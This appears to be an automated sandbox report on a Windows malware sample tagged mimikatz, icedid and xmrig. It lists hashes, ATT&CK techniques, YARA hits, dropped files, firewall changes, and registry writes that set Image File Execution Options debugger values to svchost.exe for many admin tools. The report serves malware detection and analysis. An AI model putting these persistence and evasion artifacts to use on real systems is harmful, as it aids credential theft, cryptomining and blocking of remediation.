mimikatz | cdfcbdc80ad28ff42e60caaa3dbc816f0c2746c53f8dee9c5ff7f60922433e17

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 01:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
Size

17.4MB
MD5

1aea3b4cfab52252bf4f0c8fb9437b60
SHA1

eaa2e3d31581c7908eea09b5f75dfafab0e0ca2e
SHA256

cdfcbdc80ad28ff42e60caaa3dbc816f0c2746c53f8dee9c5ff7f60922433e17
SHA512

6ca5569df5ba7d98222f50b9b41aa0fc7e9ddfe8063ce78ed694767863fdb3ee96f778a3ba89b32681fabd67805a1fa89500957e9f7035d2e13008d37d8a3307
SSDEEP

196608:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrE6mknGzwHdOgEPHd9BbX/nivPlTXTYrI:Sjz0EJ7/iv1Vjz0EJ7/iv1b

Score

10^/10

mimikatz xmrig credential_access defense_evasion discovery execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 224 created 2100	224	tbutbbj.exe	37

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (29524) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/4328-177-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-182-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-199-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-213-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-218-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-233-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-240-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-494-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-496-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-498-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-753-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig
behavioral2/memory/4328-755-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/2476-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/2476-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x0008000000023c50-6.dat	mimikatz
behavioral2/memory/1008-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/2824-138-0x00007FF768020000-0x00007FF76810E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tbutbbj.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	tbutbbj.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	tbutbbj.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3736	netsh.exe
4616	netsh.exe

Executes dropped EXE 26 IoCs

pid	Process
1008	tbutbbj.exe
224	tbutbbj.exe
1408	wpcap.exe
3928	eztkisrdr.exe
2824	vfshost.exe
4840	ypdiqfiui.exe
4756	xohudmc.exe
4712	mesuau.exe
4328	iakeqk.exe
1488	ypdiqfiui.exe
780	ypdiqfiui.exe
1472	ypdiqfiui.exe
2412	ypdiqfiui.exe
3216	ypdiqfiui.exe
4180	ypdiqfiui.exe
2052	ypdiqfiui.exe
1480	ypdiqfiui.exe
812	ypdiqfiui.exe
1792	ypdiqfiui.exe
816	ypdiqfiui.exe
3420	ypdiqfiui.exe
2972	tbutbbj.exe
3948	ypdiqfiui.exe
3844	ypdiqfiui.exe
1408	qwttvniyq.exe
4484	tbutbbj.exe

Loads dropped DLL 12 IoCs

pid	Process
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
1408	wpcap.exe
3928	eztkisrdr.exe
3928	eztkisrdr.exe
3928	eztkisrdr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	ifconfig.me
55	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\mesuau.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	tbutbbj.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\mesuau.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	tbutbbj.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	tbutbbj.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tbutbbj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	tbutbbj.exe

UPX packed file 34 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c95-134.dat	upx
behavioral2/memory/2824-135-0x00007FF768020000-0x00007FF76810E000-memory.dmp	upx
behavioral2/memory/2824-138-0x00007FF768020000-0x00007FF76810E000-memory.dmp	upx
behavioral2/files/0x0007000000023ca0-141.dat	upx
behavioral2/memory/4840-142-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4840-146-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/files/0x0007000000023c9d-163.dat	upx
behavioral2/memory/4328-164-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/1488-171-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/780-175-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-177-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/1472-180-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-182-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/2412-185-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/3216-189-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4180-193-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/2052-197-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-199-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/1480-202-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/812-206-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/1792-211-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-213-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/816-216-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-218-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/3420-221-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/3948-229-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/3844-232-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp	upx
behavioral2/memory/4328-233-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-240-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-494-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-496-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-498-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-753-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx
behavioral2/memory/4328-755-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\vieiitfbt\UnattendGC\specials\tibe-2.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\schoedcl.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\bptuvtrj\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\svschost.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\coli-0.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\tucl-1.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\upbdrjv\swrpwe.exe	tbutbbj.exe
File created	C:\Windows\bptuvtrj\tbutbbj.exe	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\cnli-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\ucl.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\svschost.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\Shellcode.ini	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\exma-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\libeay32.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\spoolsrv.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\docmicfg.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\vfshost.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\xdvl-0.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\docmicfg.xml	tbutbbj.exe
File created	C:\Windows\bptuvtrj\vimpcsvc.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\svschost.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\spoolsrv.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\vimpcsvc.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\qwttvniyq.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\trch-1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\schoedcl.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\schoedcl.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\docmicfg.xml	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\tbutbbj.exe	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\libxml2.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\AppCapture32.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\crli-0.dll	tbutbbj.exe
File opened for modification	C:\Windows\vieiitfbt\Corporate\log.txt	cmd.exe
File opened for modification	C:\Windows\vieiitfbt\tbntqyuzn\Result.txt	qwttvniyq.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\ssleay32.dll	tbutbbj.exe
File opened for modification	C:\Windows\bptuvtrj\schoedcl.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\trfo-2.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\zlib1.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\vimpcsvc.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\AppCapture64.dll	tbutbbj.exe
File created	C:\Windows\ime\tbutbbj.exe	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\Packet.dll	tbutbbj.exe
File opened for modification	C:\Windows\vieiitfbt\tbntqyuzn\Packet.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\spoolsrv.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\ip.txt	tbutbbj.exe
File created	C:\Windows\vieiitfbt\UnattendGC\specials\posh-0.dll	tbutbbj.exe
File created	C:\Windows\bptuvtrj\schoedcl.xml	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\mimidrv.sys	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\scan.bat	tbutbbj.exe
File created	C:\Windows\vieiitfbt\tbntqyuzn\wpcap.dll	tbutbbj.exe
File created	C:\Windows\vieiitfbt\Corporate\mimilib.dll	tbutbbj.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2000	sc.exe
4048	sc.exe
548	sc.exe
1080	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
